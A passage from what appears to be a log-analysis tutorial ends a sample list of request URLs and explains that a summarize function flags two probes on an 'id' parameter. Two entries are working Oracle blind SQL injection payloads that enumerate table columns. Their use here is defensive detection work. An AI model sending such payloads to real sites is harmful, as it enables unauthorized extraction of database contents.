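    "www.example.invalid/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)",
    "www.example.invalid/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))",
    "www.example.invalid/search.jsp?q=rownum%3C%3D1",
]
```

Running `summarize(SAMPLE_LOG)` yields two probes against the `id` parameter of `/index_kaoyan_view.jsp` and nothing for the lone `rownum<=1` search term; on a real log the count per parameter over a short window is the value to alert on.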
